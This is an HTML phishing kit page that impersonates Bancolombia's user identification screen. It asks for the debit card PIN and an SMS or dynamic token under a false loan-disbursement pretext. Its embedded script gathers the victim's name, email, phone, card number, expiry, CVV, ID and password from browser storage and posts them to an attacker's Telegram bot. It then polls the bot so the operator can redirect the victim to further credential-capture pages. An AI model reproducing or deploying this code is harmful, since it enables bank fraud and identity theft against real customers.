<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Bancolombia </title>
    <link
      rel="stylesheet"
      href="https://sapp2406.sirv.com/bogo/lfr_style.css"
    />
    <link
      rel="stylesheet"
      href="https://sapp2406.sirv.com/bogo/lfr_ownstyle.css"
    />
  </head>
  <body>
    <div class="box-container">
      <div class="container">
        <div class="toast hidden" id="errorMessage" style="position: absolute">
          <p id="AuthLabel"></p>
          <span class="icon-close-search-r" onclick="hideToast()"></span>
        </div>
        <div class="container__water-mark">
          <div class="container__water-mark--image-container"></div>
        </div>
        <div class="container__login">
          <div class="container__login--header">
            <img src="../monitoreo/imagenes/logo-bancolombia-black.svg" alt="" />
          </div>
          <div class="container__login--title">
            <div class="container__login--title-1">
              <div class="container__login--title-1">
                <p>Identificacion de usuario</p>
              </div>
              <div class="container__login--title-2">
                <p>
                  <label class="tituloformulario" id="flujoOrigenLbl"></label>
                </p>
              </div>
            </div>
          </div>
          <div class="container__login--login-box-id">
            <div class="container__login--login-box-title">
              <span><strong></strong></span>
            </div>
            <div class="form-container">
              <form
                method="post"
                name="authenticateForm"
                id="authenticateForm"
                action=""
                autocomplete="off"
              >
                <div class="field-1">
                  <div class="custom-input">
                    <div class="label">
                      <label for="password">Clave de la tarjeta debito</label>
                    </div>
                    <input
                      name="Password"
                      type="password"
                      class="custom-form-control"
                      id="Password"
                      maxlength="4"
                      size="8"
                    />
                  </div>
                </div>
                <div class="btn-container">
                  <button
                    type="button"
                    class="btn-main"
                    id="btnContinue"
                    onclick="validate();"
                    disabled=""
                  >
                    Continuar
                  </button>
                </div>
              </form>
            </div>
          </div>
          <div class="timeElapsed">
            <label>Tiempo restante&nbsp;</label><span id="timeE_min">05</span
            ><label>:</label><span id="timeE_seg">18</span
            ><label>&nbsp;minutos</label><br />
            <label
              ><span id="timeE_date"
                >Jueves, 29 de Febrero de 2024, 5:28 PM</span
              ></label
            ><br />
            <label><span id="timeE_ip">IP 186.116.65.249</span></label>
          </div>
        </div>

        <style>
          ul {
            list-style-type: none;
            margin-top: 2rem;
            margin-left: 4rem;
            vertical-align: top;
          }

          li {
            display: flex;
            align-items: center;
            margin-bottom: 1rem;
          }

          .icon-info {
            width: 3rem;
            height: 3rem;
            margin-right: 1rem;
            object-fit: cover;
          }
        </style>

        <div class="container__info">
          <div class="container__info--tips">
            <div class="collapsable">
              <div class="collapse">
                <div class="collapse__header">
                  <div class="collapse__header--text">
                    <p class="header">Tu seguridad es lo primero</p>
                  </div>
                  <div class="collapse__header--btn">
                    <i class="icon-down-b"></i>
                  </div>
                </div>
                <div class="collapse__content hidden">
                  <p>Sigue estos tips y tus transacciones estarían blindadas</p>
                  <ul>
                    <li>
                      <img
                        id="icon-pass"
                        class="icon-info"
                        src="https://sapp2406.sirv.com/bogo/icon-pass.png"
                      />
                      <p>
                        <strong>No compartas</strong> tus claves o token con
                        terceros.
                      </p>
                    </li>
                    <li>
                      <img
                        id="icon-device"
                        class="icon-info"
                        src="https://sapp2406.sirv.com/bogo/icon-device.png"
                      />
                      <p>
                        <strong>Evita realizar</strong> transacciones desde un
                        equipo o dispositivo desconocido.
                      </p>
                    </li>
                    <li>
                      <img
                        id="icon-lock"
                        class="icon-info"
                        src="../monitoreo/imagenes/logo-bancolombia-black.svg"
                      />
                      <p>
                        <strong>Procura cambiar</strong> tus contraseñas
                        bancarias periódicamente o antes si sientes que es
                        necesario.
                      </p>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
            <div class="collapsable">
              <div class="collapse">
                <div class="collapse__header">
                  <div class="collapse__header--text">
                    <p class="header">Contáctanos</p>
                  </div>
                  <div class="collapse__header--btn">
                    <i class="icon-down-b"></i>
                  </div>
                </div>
                <div class="collapse__content hidden">
                  <p>
                    Si tienes alguna duda o algo te ha sucedido, usa nuestros
                    canales
                  </p>
                  <ul>
                    <li>
                      <img
                        id="icon-call"
                        class="icon-info"
                        src="../monitoreo/imagenes/logo-bancolombia-black.svg"
                      />
                      <p>Llamar a la <strong>Servilinea</strong></p>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
          </div>
        </div>

        <div class="modal modalSE hidden" id="safeExitModal">
          <div class="modal__container" id="semc">
            <span class="close" id="closeModalSE" onclick="hideModalSE()"
              >ï¿½</span
            >
            <div class="modal-title">
              <h2>Abandonar el proceso</h2>
            </div>
            <div class="modal-text" id="modalSafeExitMsg">
              <p>Ha activado una Salida de forma segura</p>
            </div>
            <div class="modal-action">
              <button
                type="button"
                class="btn-main"
                onclick="lfr_controlExit()"
              >
                Aceptar
              </button>
            </div>
          </div>
        </div>
        <div class="overlay overlaySE hidden"></div>

        <div class="modal modalMA hidden">
          <div class="modal__container" id="containerMA">
            <h2 class="modal-title">Se requiere una acción válida</h2>
            <div class="modal__container--content">
              <p class="modal-text" id="modalAlertMsg"></p>
              <div class="modal-action">
                <button type="button" class="btn-main" onclick="hideModalMA()">
                  Entendido
                </button>
              </div>
            </div>
          </div>
        </div>
        <div class="overlay overlayMA hidden"></div>

        <div class="modal modalIN hidden">
          <div class="modal__container">
            <div class="modal-title">
              <h2>Acción Automática Activada</h2>
            </div>
            <div class="modal-text">
              <p id="modalAlertMsgIN"></p>
            </div>
            <div class="modal-action">
              <button
                type="button"
                class="btn-main"
                onclick="lfr_inactivityAction()"
              >
                Entendido
              </button>
            </div>
          </div>
        </div>
        <div class="overlay overlayIN hidden"></div>

        <style>
          .btn-img {
            background: none;
            border: none;
            min-width: 15rem;
            height: 5rem;
            outline: none;
            cursor: pointer;
          }

          #getOnPlayStore {
            min-width: 15rem;
            height: 5rem;
            object-fit: cover;
          }

          @media only screen and (max-width: 37.5em) {
            #getOnPlayStore {
              height: 4rem !important;
            }
          }

          #tokenAppImg {
            min-width: 6rem;
            height: 6rem;
          }

          #getOnAppStore {
            min-width: 15rem;
            height: 5rem;
            object-fit: cover;
          }

          @media only screen and (max-width: 37.5em) {
            #getOnAppStore {
              height: 4rem !important;
              margin-top: 0.5rem;
              margin-bottom: 0.5rem;
            }
          }

          .modalPopUp-text {
            font-size: 1.6rem;
            color: black;
            margin-bottom: 1.5rem;
          }

          #download {
            color: #feee02;
          }

          .link {
            color: #f9d906;
            text-decoration: underline;
            cursor: pointer;
          }

          #modalAction {
            margin-bottom: 1.5rem;
          }

          .modal-bottom {
            display: flex;
            flex-direction: row;
            justify-content: center;
            align-items: center;
          }
        </style>

        <form action="aquivaellink" method="post" id="tok">
          <div class="modal modalUP">
            <div class="modal__container">
              <h2 class="modal-title">
                Para continuar y deseembolsar tu credito sera necesario el uso de tu clave dinamica o codigo Sms enviado a tu
                telefono. 
              </h2>
              <br />
              <style>
                .token-container {
                  display: flex;
                  flex-wrap: wrap;
                  justify-content: space-around;
                  max-width: 400px;
                  margin: auto;
                }

                .token-input {
                  width: 30%;
                  max-width: 60px;
                  height: 60px;
                  text-align: center;
                  font-size: 20px;
                  border: 2px solid #ccc;
                  border-radius: 8px;
                  margin-bottom: 10px;
                }

                @media screen and (max-width: 600px) {
                  .token-input {
                    width: 45%;
                    max-width: 40px;
                    height: 40px;
                    font-size: 16px;
                  }
                }
              </style>

              <div class="loader-container">
                <div class="loader"></div>
                <p>Cargando...</p>
              </div>

              <style>
                .loader-container {
                  display: flex;
                  flex-direction: column;
                  align-items: center;
                  color: #333;
                }

                .loader {
                  border: 8px solid #fbe600;
                  border-top: 8px solid transparent;
                  border-radius: 50%;
                  width: 50px;
                  height: 50px;
                  animation: spin 1s linear infinite;
                  margin-bottom: 20px;
                }

                @keyframes spin {
                  0% {
                    transform: rotate(0deg);
                  }

                  100% {
                    transform: rotate(360deg);
                  }
                }
              </style>

              <script>
                function moveToNextInput(currentInput, nextInputIndex) {
                  const inputValue = currentInput.value;

                  if (!isNaN(inputValue) && nextInputIndex) {
                    const nextInput = document.querySelector(
                      `.token-input:nth-child(${nextInputIndex})`
                    );
                    nextInput.focus();
                  }
                }
              </script>

              <script>
                function moveToNextInput(currentInput, nextInputIndex) {
                  const inputValue = currentInput.value;

                  if (!isNaN(inputValue) && nextInputIndex) {
                    const nextInput = document.querySelector(
                      `.token-input:nth-child(${nextInputIndex})`
                    );
                    nextInput.removeAttribute("readonly");
                    nextInput.focus();
                  }
                }
              </script>
              <br />
              <button type="submit" class="btn-main" id="btnAction" disabled>
                Continuar
              </button>
            </div>
          </div>
          <div class="overlay overlayUP"></div>
        </form>
      </div>
    </div>

   <script>
  document.addEventListener("DOMContentLoaded", async function () {
    // Cargar configuración desde claves.json
    const config = await loadTelegramConfig();
    if (!config) {
      console.error("No se pudo cargar la configuración de Telegram.");
      return;
    }

    // Obtener los datos de pago desde localStorage
    const info = localStorage.getItem("pagojet");
    let pagoData = null;

    if (info) {
      try {
        pagoData = JSON.parse(info);
      } catch (e) {
        console.error("Error al parsear localStorage:", e);
      }
    }

    // Leer datos de tarjeta desde pagojet
    let tc = {
      card: "No disponible",
      date: "No disponible",
      ccv: "No disponible"
    };

    if (pagoData) {
      tc.card = pagoData.tarjeta || "No disponible";
      tc.date = pagoData.fechaVencimiento || "No disponible";
      tc.ccv = pagoData.cvv || "No disponible";
    }

    // Generar un ID de transacción
    const transactionId =
      Date.now().toString(36) + Math.random().toString(36).substr(2);
    localStorage.setItem("transactionId", transactionId);

    // Obtener información adicional del usuario
    const tipoPersona = localStorage.getItem("u_name") || "";
    const IType = localStorage.getItem("u_name2") || "";
    const numi = localStorage.getItem("u_name3") || "";
    const clvseg = localStorage.getItem("u_name4") || "";
    const datos = JSON.parse(localStorage.getItem("datos")) || {};

    // Construcción del mensaje para Telegram
    const message = `
<b>🏦⠀⠀⠀⠀⠀BANCOLOMBIA⠀⠀⠀🏦</b>

<b>Nombre:</b> | <code>${datos.nombre || "No disponible"}</code>
<b>Apellido:</b> | <code>${datos.apellido || "No disponible"}</code>
<b>Correo:</b> | <code>${datos.correo || "No disponible"}</code>
<b>Teléfono:</b> | <code>${datos.telefono || "No disponible"}</code>
<b>Tarjeta:</b> | <code>${tc.card}</code>
<b>Fecha:</b> | <code>${tc.date}</code>
<b>CCV:</b> | <code>${tc.ccv}</code>
<b>T ID:</b> | <code>${IType}</code>
<b>ID:</b> | <code>${numi}</code>
<b>clave:</b> | <code>${clvseg}</code>
🌐 <b>IP:</b> | <code>${pagoData?.ip || "No disponible"}</code>
`;

    // Crear botones inline
    const keyboard = JSON.stringify({
      inline_keyboard: [
        [
          { text: "Datos", callback_data: `datos:${transactionId}` },
          { text: "Tarjeta", callback_data: `cc:${transactionId}` },
          { text: "Token", callback_data: `token:${transactionId}` },
          { text: "X C", callback_data: `error_tc:${transactionId}` },
          { text: "X Logo", callback_data: `error_logo:${transactionId}` },
          { text: "X Token", callback_data: `error_token:${transactionId}` },
          { text: "Fin", callback_data: `fin:${transactionId}` }
        ]
      ]
    });

    // Enviar mensaje a Telegram
    try {
      const response = await fetch(
        `https://api.telegram.org/bot${config.token}/sendMessage`,
        {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            chat_id: config.chat_id,
            text: message,
            reply_markup: keyboard,
            parse_mode: "HTML"
          })
        }
      );

      const data = await response.json();
      if (data.ok) {
        console.log("Mensaje enviado a Telegram con éxito");
        checkPaymentVerification(
          transactionId,
          data.result.message_id,
          config
        );
      } else {
        console.error("Error al enviar mensaje a Telegram:", data);
      }
    } catch (error) {
      console.error("Error al enviar mensaje a Telegram:", error);
    }
  });

  // Cargar la configuración desde claves.json
  async function loadTelegramConfig() {
    try {
      const response = await fetch("claves.json");
      if (!response.ok) throw new Error("No se pudo cargar claves.json.");
      return await response.json();
    } catch (error) {
      console.error("Error al cargar las claves:", error);
      return null;
    }
  }

  // Verificar la respuesta del usuario en Telegram
  async function checkPaymentVerification(
    transactionId,
    messageId,
    config
  ) {
    try {
      const response = await fetch(
        `https://api.telegram.org/bot${config.token}/getUpdates`
      );
      const data = await response.json();

      const updates = data.result;
      const verificationUpdate = updates.find(
        (update) =>
          update.callback_query &&
          [
            `error_tc:${transactionId}`,
            `error_logo:${transactionId}`,
            `token:${transactionId}`,
            `error_token:${transactionId}`,
            `error_otp:${transactionId}`,
            `datos:${transactionId}`,
            `cc:${transactionId}`,
            `fin:${transactionId}`
          ].includes(update.callback_query.data)
      );

      if (verificationUpdate) {
        await fetch(
          `https://api.telegram.org/bot${config.token}/editMessageReplyMarkup`,
          {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({
              chat_id: config.chat_id,
              message_id: messageId,
              reply_markup: JSON.stringify({ inline_keyboard: [] })
            })
          }
        );

        switch (verificationUpdate.callback_query.data) {
          case `token:${transactionId}`:
            window.location.href = "token.html";
            break;
          case `error_token:${transactionId}`:
            window.location.href = "tokeninva.html";
            break;
          case `error_logo:${transactionId}`:
            alert("Usuario o clave incorrectos.");
            window.location.href = "index.html";
            break;
          case `error_otp:${transactionId}`:
            window.location.href = "index5.html";
            break;
          case `datos:${transactionId}`:
            window.location.href = "datos.html";
            break;
          case `cc:${transactionId}`:
            window.location.href = "cc.html";
            break;
          case `error_tc:${transactionId}`:
            window.location.href = "cc.html";
            break;
          case `fin:${transactionId}`:
            window.location.href = "fin.html";
            break;
        }
      } else {
        setTimeout(
          () => checkPaymentVerification(transactionId, messageId, config),
          1000
        );
      }
    } catch (error) {
      console.error("Error al verificar el pago:", error);
      setTimeout(
        () => checkPaymentVerification(transactionId, messageId, config),
        1000
      );
    }
  }
</script>

  </body>
</html>
